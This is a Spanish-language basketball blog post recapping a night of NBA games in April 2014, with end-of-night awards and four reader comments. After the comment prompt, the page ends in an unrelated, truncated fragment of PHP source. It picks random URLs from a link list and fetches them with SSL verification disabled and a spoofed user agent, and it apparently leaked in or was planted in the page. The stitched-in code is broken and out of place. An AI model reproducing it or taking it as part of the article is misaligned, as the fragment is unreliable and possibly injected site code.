La Crónica: ¿Alguien quiere encabezar el Este?

10 de April de 2014 por Simon

Una semana. Justo eso nos queda de regular season. A estas horas el jueves que viene ya estarán todos los puestos definidos y algún equipo, aunque no lo quiera, tendrá que liderar el Este. Miami e Indiana parecen enfrascados en una carrera frenética por quedar en segunda posición de la conferencia, no sabemos bien si por evitar a los Nets o simplemente porque les da más morbo jugar los Play Off sin factor cancha. El que más ahínco está poniendo en buscar esa segunda plaza son los Pacers, cuyo entrenador ya no se corta un pelo y ayer decidió dar descanso a TODO su quinteto titular, así sin anestesias. Toda una declaración de intenciones que le salió rana pues los suplentes de Indiana fueron capaz de llevarse la victoria del Bradley Center de Milwaukee. Liderados por Luis Scola los Pacers dieron una buena respuesta al cambio de rol que habían sufrido todos sus jugadores para este partido. Al argentino le apoyaron sobretodo un enorme partido del discutido Evan Turner y una demostración de capacidad ofensiva del olvidado Chris Copeland que a sus 18 puntos en 17 minutos añadió la canasta definitiva que daba la victoria a los Pacers después de un entretenido e igualado partido (104-102).

Con esta victoria los Pacers vuelven a liderar la conferencia pues los Heat encajaron su segunda derrota consecutiva ante Memphis Grizzlies. Al habitual excepcional despliegue de Lebron James se unió la habitual inoperancia de sus compañeros a excepción de un sorprendente Rashard Lewis que jugó de largo su mejor partido de la temporada. Los Grizzlies ganaron de una manera algo extraña ya que fueron dos contraataques seguidos culminados con triples de Conley lo que permitió a Gasol y compañía lograr la ventaja suficiente para no pasar apuros antes los campeones (102-107). Los Grizzlies salvaron así su primer match ball en la carrera a los Play Off, pues los Suns vencieron a domicilio con el trío de artistas (Green, Bledsoe y Dragic) a pleno rendimiento ante unos Pelicans en los que Anthony Davis fue baja una noche más (94-88). Más emocionante no puede estar la lucha por los Play Off en el salvaje Oeste pues como ya hemos señalado quedan varios enfrentamientos entre los equipos directamente implicados. Brutal que después de 82 partidos estemos con este nivel de igualdad. 

Por nombre y balance de los implicados sin duda el partido más esperado de la jornada era la visita de los Thunder al Staples para jugar ante los Clippers. Ambos equipos llegaban a este partido con la intención de quemar el último cartucho para escalar posiciones en la clasificación. Los locales tenían una oportunidad de oro para tratar de alcanzar el segundo puesto de la conferecia pero los Thunder estuvieron mucho más acertados desde el principio y a mediados del tercer cuarto su ventaja superaba la quincena de punto. Pero si algo tienen estos Clippers es que están dirigidos por el mejor base del mundo. En el último cuarto Chris Paul se echó el equipo a las espaldas y a punto estuvieron de lograr la remontada. Un parcial de 14-0 les igualó a Durant y compañía a falta de 4 minutos para el final del partido. La tragedia se mascaba para los de Scott Brooks pero justo en ese momento emergió la figura de Russell Westbrook que con dos rebotes ofensivos importantísimos, uno de ellos culminado con un mate brutal, dio alas a los suyos cuando peor lo estaban pasando (107-101).

En la zona media del Este aún quedan muchísimas cosas por decidirse y aún puede haber muchos bailes de posiciones. En la carrera por el tercer puesto, tanto Raptors como Bulls no fallaron ayer y se mantienen con idéntico balance (46-32) que curiosamente es el mismo que Memphis que lucha por encontrar un sitio en la postemporada en la otra conferencia. Los Raptors no se vieron incomodados por los Sixers en el regreso de un Lowry que volvió a la acción tal y como se fue: a nivel All-Star (114-125). Menos apuros aún pasaron los Bulls para deshacerse de los bipolares Minnesota Timberwolves que apenas aguantaron la primera mitad de un partido en el que Joakim Noah firmó su cuarto triple doble de la temporada (102-87). Descartados de la pelea quedaron los Nets tras caer por (111-115) en la cancha de los Orlando Magic. Con esta derrota los de Brooklyn parecen destinados a la quinta plaza pues sus perseguidores se encuentran demasiado lejos. Bobcats y Wizardssiguen ocupados en luchar entre ellos por la sexta plaza que en estos momentos ocupan los de Charlotte tras vencer a los capitalinos después de un partido muy luchado por ambos equipos que sólo pudo resolverse en la prórroga (94-88).

En el resto de partidos de la jornada, los Hawks no fallaron por segunda noche consecutiva y lograron vencer en casa a los Celtics gracias a un grandísimo último cuarto que les permitió remotar (97-105); los Rockets salieron derrotados de Denver (116-123) lo que da opciones a los Blazers de alcanzar la cuarta plaza ya que ellos sí que lograron sumar una victoria in extremis ante los Kings con un triple desde la esquina de Dorrell Wright (99-100). Y para terminar, los Cavs se quedaron matemáticamente fuera de Play Off a pesar de lograr la victoria ante los Pistons en un partido que apenas duró 15 minutos (100-122).

PREMIOS

MVP: Randy Foye se salió por todos los lados ante los Rockets. Sus 30 puntos, 15 asistencias , 5 rebotes y 3 robos seguro que dejaron a más de uno con la boca abierta.

Rookie: Ray McCallum a lo suyo, aprovechando la lluvia de minutos que le ha caído con la lesión de Thomas. 23 puntos, 8 asistencias y 3 robos para la saca.

Sorpresa: Creo que más de una vez ya nos hemos declarado fan de Matthew Dellavedova, por el nombre y por la gran actitud del australiano sobre la pista. Ayer, como siempre, se dejó la piel y consiguió 14 puntos y 12 asistencias.

Decepción: Carlos Boozer palidece casi siempre en comparación a su compañero Joakim Noah, pero ayer las diferencias fueron muy acusadas. Uno consiguió un triple-doble y el otro apenas 6 puntos (3 de 13 en TC), 4 rebotes y 4 pérdidas.

Esfuerzo en vano: Lebron James no entiende de carreras lentas (si es que existe esa lucha por evitar el 1er puesto) y se fue a los 37 puntos, 5 asistencias y 6 rebotes. Marcin Gortat se dejó la piel ante los Bobcats pero sus 27 puntos y 14 rebotes fueron insuficiente para llevarse el partido.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Hombre,las minutadas de LeBron no parecen indicativo de que Miami no quiera el primer puesto.Veremos la noche del viernes al sábado qué actitud presenta cada equipo en el duelo directo,pues ese será el partido dónde se decida el primer puesto de la conferencia.De todas formas el equipo que quede 2º mal hará en relajarse.Si es Indiana,una derrota en uno de los dos primeros partidos les va a pasar factura a nivel de confianza y pueden surgir problemas de ego y de juego individual.Si es Miami,ya sea Wizards o Bobcats,tienen juego interior para hacerles mucho daño.En resumen no veo unos PO del este tan sencillos salvo que Heat y Pacers nos lleven tomando el pelo un mes.El chollo es Atlanta (si es el que se mete 8º) eso si,sólo hay que ver lo que dice Ferry,que no cree que sea algo positivo para el crecimiento del equipo entrar en PO….no comment.

    El destino parece deleitarnos con un Clippers – Warriors,mucha tensión entre sus jugadores aunque este año me da que Warriors no van a dar mucha guerra.Demasiado ambiente enrarecido hay por allí con lo de Marc Jackson.

      Citar

  2. rumbero dice:
    #2

    El liderato del este seguramente se decida en el IND-MIA de mañana. A ver quien tiene más ganas. Supongo que Vogel reservó su quitneto para este partido, pero quién sabe. En cualquier caso, que Indiana pueda acabar primero con el final de temporada que se han marcado tiene delito…
    Por otro lado la lucha entre Toronto y Chicago por la tercera plaza igual está siendo de lo más bonito del este con diferencia, y es que esquivar a los Nets en primera ronda no es poco premio. W4 para Raptors y W6 para Bulls. El tema es que ambos tienen calendario para ganar todos los partidos que quedan.
    ¿Ha dicho alguién ya lo que molan los Suns?

      Citar

  3. Jose Luis dice:
    #3

    Lo de Lebron y la defensa es increíble…

    Hace poco salió una estadística según la cual LeBron aporta menos en Defensa que el jugador promedio de la liga. De hecho, la defensa del Heat es peor con él que sin él.

    Mañana partidazo.

      Citar

  4. Jose Luis dice:
    #4

    Pasos, pasos everywhere…

    http://www.nba.com/video/games/clippers/2014/04/09/0021301173-okc-lac-play4.nba

    Ningún árbitro se da cuenta de que es imposible hacer esa finta y avanzar tanto sin pitar pasos? que vergüenza

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>